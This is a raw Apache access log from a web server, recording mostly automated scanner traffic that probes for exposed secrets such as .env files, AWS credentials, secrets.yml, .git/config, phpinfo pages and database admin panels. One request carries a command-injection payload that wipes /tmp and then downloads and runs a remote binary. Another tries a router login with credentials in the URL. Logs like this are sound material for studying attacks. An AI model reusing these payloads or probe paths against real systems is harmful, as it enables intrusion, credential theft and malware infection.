5.116.210.175 - - [28/Mar/2023:19:36:57 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
66.115.189.137 - - [28/Mar/2023:19:52:37 +0000] "GET /apis/apps/v1/namespaces/kube-system/daemonsets HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
34.229.110.65 - - [28/Mar/2023:20:05:10 +0000] "GET /.env HTTP/1.1" 200 - "-" "python-requests/2.27.1"
34.229.110.65 - - [28/Mar/2023:20:05:11 +0000] "POST / HTTP/1.1" 405 409716 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
34.229.110.65 - - [28/Mar/2023:20:05:13 +0000] "POST /core/.env HTTP/1.1" 405 412352 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
34.229.110.65 - - [28/Mar/2023:20:05:15 +0000] "GET /core/.env HTTP/1.1" 200 - "-" "python-requests/2.27.1"
34.229.110.65 - - [28/Mar/2023:20:05:15 +0000] "POST / HTTP/1.1" 405 409650 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
34.229.110.65 - - [28/Mar/2023:20:05:18 +0000] "POST /core/.env HTTP/1.1" 405 412316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
34.229.110.65 - - [28/Mar/2023:20:05:21 +0000] "GET /phpmyadmin/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
34.229.110.65 - - [28/Mar/2023:20:05:22 +0000] "GET /PMA/ HTTP/1.1" 301 233 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
34.229.110.65 - - [28/Mar/2023:20:05:23 +0000] "GET /adminer.php HTTP/1.1" 200 1951 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
135.125.246.110 - - [28/Mar/2023:20:10:25 +0000] "POST / HTTP/1.1" 405 409738 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
94.102.61.10 - - [28/Mar/2023:20:10:45 +0000] "GET /assets/front/base/images/favicon/16_16/favicon.png HTTP/1.1" 200 3098 "-" "python-requests/2.26.0"
94.102.61.10 - - [28/Mar/2023:20:10:45 +0000] "GET /assets/img/apple-touch-icon.png HTTP/1.1" 200 - "-" "python-requests/2.26.0"
94.102.61.10 - - [28/Mar/2023:20:10:46 +0000] "GET / HTTP/1.1" 200 8383 "-" "python-requests/2.26.0"
35.89.0.80 - - [28/Mar/2023:20:43:39 +0000] "GET /awsConfig.js HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
35.89.0.80 - - [28/Mar/2023:20:43:39 +0000] "GET /config/env.js HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
35.89.0.80 - - [28/Mar/2023:20:43:40 +0000] "GET /settings.yml HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
35.89.0.80 - - [28/Mar/2023:20:43:41 +0000] "GET /config/secrets.yml HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
35.89.0.80 - - [28/Mar/2023:20:43:41 +0000] "GET /configuration.yml HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
35.89.0.80 - - [28/Mar/2023:20:43:42 +0000] "GET /index.js HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
35.89.0.80 - - [28/Mar/2023:20:43:42 +0000] "GET /.aws/credentials HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
35.89.0.80 - - [28/Mar/2023:20:43:43 +0000] "GET /_phpinfo.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
35.89.0.80 - - [28/Mar/2023:20:43:44 +0000] "GET /_profiler/phpinfo HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
35.89.0.80 - - [28/Mar/2023:20:43:44 +0000] "GET /index.php HTTP/1.1" 200 8405 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
35.89.0.80 - - [28/Mar/2023:20:43:45 +0000] "GET /php-info HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
35.89.0.80 - - [28/Mar/2023:20:43:46 +0000] "GET /php-info.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
35.89.0.80 - - [28/Mar/2023:20:43:46 +0000] "GET /php.ini HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
35.89.0.80 - - [28/Mar/2023:20:43:47 +0000] "GET /php_info.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
35.89.0.80 - - [28/Mar/2023:20:43:47 +0000] "GET /phpinfo HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
35.89.0.80 - - [28/Mar/2023:20:43:48 +0000] "GET /phpinfo.php HTTP/1.1" 200 23937 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
35.89.0.80 - - [28/Mar/2023:20:43:49 +0000] "GET /temp.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
35.89.0.80 - - [28/Mar/2023:20:43:50 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
35.89.0.80 - - [28/Mar/2023:20:43:50 +0000] "GET /.env.save HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
35.89.0.80 - - [28/Mar/2023:20:43:51 +0000] "GET /.env.backup HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
35.89.0.80 - - [28/Mar/2023:20:43:51 +0000] "POST / HTTP/1.1" 405 409717 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [28/Mar/2023:20:50:18 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.104.11.34 - - [28/Mar/2023:20:51:20 +0000] "\x16\x03\x01" 400 226 "-" "-"
47.254.255.160 - - [28/Mar/2023:21:04:42 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
47.254.255.160 - - [28/Mar/2023:21:04:44 +0000] "POST / HTTP/1.1" 405 409730 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
47.254.255.160 - - [28/Mar/2023:21:06:16 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
47.254.255.160 - - [28/Mar/2023:21:06:18 +0000] "POST / HTTP/1.1" 405 409736 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.246.110 - - [28/Mar/2023:21:23:14 +0000] "POST / HTTP/1.1" 405 409718 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
205.210.31.155 - - [28/Mar/2023:21:24:55 +0000] "\x16\x03\x01" 400 226 "-" "-"
179.0.252.232 - - [28/Mar/2023:21:28:58 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
43.154.128.189 - - [28/Mar/2023:22:09:33 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
91.92.122.6 - - [28/Mar/2023:22:17:11 +0000] "GET / HTTP/1.1" 200 41226 "http://13.244.159.169:80/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4896.127 Safari/537.36"
162.221.192.26 - - [28/Mar/2023:22:23:25 +0000] "GET / HTTP/1.1" 200 8382 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
114.35.105.44 - - [28/Mar/2023:22:25:13 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 193.42.32.175/jaws;sh+/tmp/jaws" 400 226 "-" "-"
45.79.181.94 - - [28/Mar/2023:22:47:20 +0000] "\x16\x03\x01" 400 226 "-" "-"
135.125.246.110 - - [28/Mar/2023:23:08:16 +0000] "POST / HTTP/1.1" 405 409686 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [28/Mar/2023:23:28:46 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.32.162.159 - - [28/Mar/2023:23:36:16 +0000] "GET / HTTP/1.1" 200 8384 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
179.43.177.242 - - [28/Mar/2023:23:37:17 +0000] "GET / HTTP/1.1" 200 41226 "-" "Hello World"
185.180.143.71 - - [28/Mar/2023:23:40:48 +0000] "GET / HTTP/1.1" 200 8380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
135.125.246.110 - - [28/Mar/2023:23:48:04 +0000] "POST / HTTP/1.1" 405 409724 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
107.170.253.18 - - [28/Mar/2023:23:49:00 +0000] "MGLNDD_13.244.159.169_80\n" 400 226 "-" "-"
94.102.61.10 - - [29/Mar/2023:00:36:08 +0000] "GET / HTTP/1.1" 200 8380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
193.32.162.159 - - [29/Mar/2023:00:44:51 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.154.128.189 - - [29/Mar/2023:00:47:48 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
44.210.124.172 - - [29/Mar/2023:01:05:39 +0000] "GET / HTTP/1.1" 200 8386 "-" "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/57.0.3071.54 Safari/537.32"
135.125.246.110 - - [29/Mar/2023:01:12:59 +0000] "POST / HTTP/1.1" 405 409686 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [29/Mar/2023:02:07:05 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
185.254.196.173 - - [29/Mar/2023:02:07:25 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [29/Mar/2023:02:07:27 +0000] "POST / HTTP/1.1" 405 409754 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.77.247.119 - - [29/Mar/2023:02:19:18 +0000] "POST /core/.env HTTP/1.1" 405 411499 "-" "curl/7.64.0"
193.32.162.159 - - [29/Mar/2023:02:29:14 +0000] "GET / HTTP/1.1" 200 8386 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
172.105.128.13 - - [29/Mar/2023:02:49:43 +0000] "\x16\x03\x01" 400 226 "-" "-"
43.154.128.189 - - [29/Mar/2023:03:26:35 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
20.232.101.84 - - [29/Mar/2023:03:37:36 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
20.232.101.84 - - [29/Mar/2023:03:37:36 +0000] "POST / HTTP/1.1" 405 422659 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
135.125.246.110 - - [29/Mar/2023:03:52:15 +0000] "POST / HTTP/1.1" 405 409722 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.32.162.159 - - [29/Mar/2023:04:23:03 +0000] "GET / HTTP/1.1" 200 8381 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
40.83.2.254 - - [29/Mar/2023:04:30:15 +0000] "GET / HTTP/1.1" 200 8385 "-" "Mozilla/5.0 zgrab/0.x"
43.154.128.189 - - [29/Mar/2023:04:46:17 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
172.104.11.4 - - [29/Mar/2023:04:51:09 +0000] "\x16\x03\x01" 400 226 "-" "-"
184.105.139.70 - - [29/Mar/2023:04:52:59 +0000] "GET / HTTP/1.1" 200 8382 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0"
184.105.139.70 - - [29/Mar/2023:04:55:21 +0000] "GET /favicon.ico HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
184.105.139.70 - - [29/Mar/2023:04:56:05 +0000] "GET /geoserver/web/ HTTP/1.1" 301 243 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0"
146.190.16.109 - - [29/Mar/2023:05:19:05 +0000] "\x16\x03\x01" 400 226 "-" "-"
146.190.16.109 - - [29/Mar/2023:05:19:05 +0000] "\x16\x03\x01" 400 226 "-" "-"
146.190.16.109 - - [29/Mar/2023:05:19:06 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
146.190.16.109 - - [29/Mar/2023:05:19:06 +0000] "GET /client/get_targets HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
146.190.16.109 - - [29/Mar/2023:05:19:06 +0000] "GET /upl.php HTTP/1.1" 200 - "-" "Mozilla/5.0"
146.190.16.109 - - [29/Mar/2023:05:19:07 +0000] "\x16\x03\x01" 400 226 "-" "-"
146.190.16.109 - - [29/Mar/2023:05:19:07 +0000] "GET /geoip/ HTTP/1.1" 301 235 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
146.190.16.109 - - [29/Mar/2023:05:19:07 +0000] "GET / HTTP/1.1" 200 8381 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Snapchat/10.77.0.54 (like Safari/604.1)"
146.190.16.109 - - [29/Mar/2023:05:19:08 +0000] "GET /favicon.ico HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
115.63.35.177 - - [29/Mar/2023:05:40:35 +0000] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 200 - "-" "-"
109.237.98.226 - - [29/Mar/2023:05:44:57 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
109.237.98.226 - - [29/Mar/2023:05:44:57 +0000] "\x16\x03\x01\x01H\x01" 400 226 "-" "-"
109.237.98.226 - - [29/Mar/2023:05:44:57 +0000] "POST /.env HTTP/1.1" 405 411993 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
66.240.205.34 - - [29/Mar/2023:05:45:15 +0000] "Gh0st\xad" 400 226 "-" "-"
179.43.177.242 - - [29/Mar/2023:05:58:33 +0000] "GET / HTTP/1.1" 200 41226 "-" "Hello World"
43.154.128.189 - - [29/Mar/2023:06:05:42 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
135.125.246.110 - - [29/Mar/2023:06:23:52 +0000] "POST / HTTP/1.1" 405 409724 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
::1 - - [29/Mar/2023:07:20:41 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [29/Mar/2023:07:20:42 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [29/Mar/2023:07:20:43 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [29/Mar/2023:07:20:44 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [29/Mar/2023:07:20:45 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [29/Mar/2023:07:20:46 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [29/Mar/2023:07:20:47 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
43.154.128.189 - - [29/Mar/2023:07:25:46 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.32.162.159 - - [29/Mar/2023:07:27:10 +0000] "GET / HTTP/1.1" 200 8384 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
::1 - - [29/Mar/2023:07:47:06 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [29/Mar/2023:07:47:07 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [29/Mar/2023:07:47:08 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [29/Mar/2023:07:47:09 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [29/Mar/2023:07:47:10 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [29/Mar/2023:07:47:11 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [29/Mar/2023:07:47:12 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
198.199.102.221 - - [29/Mar/2023:07:54:10 +0000] "GET / HTTP/1.1" 200 8384 "-" "Mozilla/5.0 zgrab/0.x"
135.125.217.54 - - [29/Mar/2023:07:54:31 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.217.54 - - [29/Mar/2023:07:54:31 +0000] "POST / HTTP/1.1" 405 409723 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
159.65.111.248 - - [29/Mar/2023:08:12:28 +0000] "GET / HTTP/1.0" 200 41226 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0"
43.154.128.189 - - [29/Mar/2023:08:46:37 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
135.125.217.54 - - [29/Mar/2023:09:34:00 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.217.54 - - [29/Mar/2023:09:34:00 +0000] "POST / HTTP/1.1" 405 409737 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
162.243.141.14 - - [29/Mar/2023:09:41:31 +0000] "GET /hudson HTTP/1.1" 200 - "-" "Mozilla/5.0 zgrab/0.x"
106.51.71.66 - - [29/Mar/2023:09:47:34 +0000] "GET /v1/agent/self HTTP/1.1\n" 400 226 "-" "-"
186.233.181.111 - - [29/Mar/2023:10:40:42 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
135.125.217.54 - - [29/Mar/2023:10:45:27 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.217.54 - - [29/Mar/2023:10:45:28 +0000] "POST / HTTP/1.1" 405 409761 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.79.181.223 - - [29/Mar/2023:10:59:34 +0000] "\x16\x03\x01" 400 226 "-" "-"
43.154.128.189 - - [29/Mar/2023:11:31:57 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
20.232.101.84 - - [29/Mar/2023:11:54:24 +0000] "GET /.git/config HTTP/1.1" 200 - "-" "python-requests/2.28.1"
20.232.101.84 - - [29/Mar/2023:11:54:24 +0000] "GET /fedex/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
20.232.101.84 - - [29/Mar/2023:11:54:25 +0000] "POST /fedex/.env HTTP/1.1" 405 412352 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
20.232.101.84 - - [29/Mar/2023:11:54:27 +0000] "GET /pma/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
20.232.101.84 - - [29/Mar/2023:11:54:27 +0000] "GET /mysqladmin/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
20.232.101.84 - - [29/Mar/2023:11:54:28 +0000] "GET /sqlmanager/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
20.232.101.84 - - [29/Mar/2023:11:54:28 +0000] "GET /PMA/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
20.232.101.84 - - [29/Mar/2023:11:54:28 +0000] "GET /phpmyadmin2/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
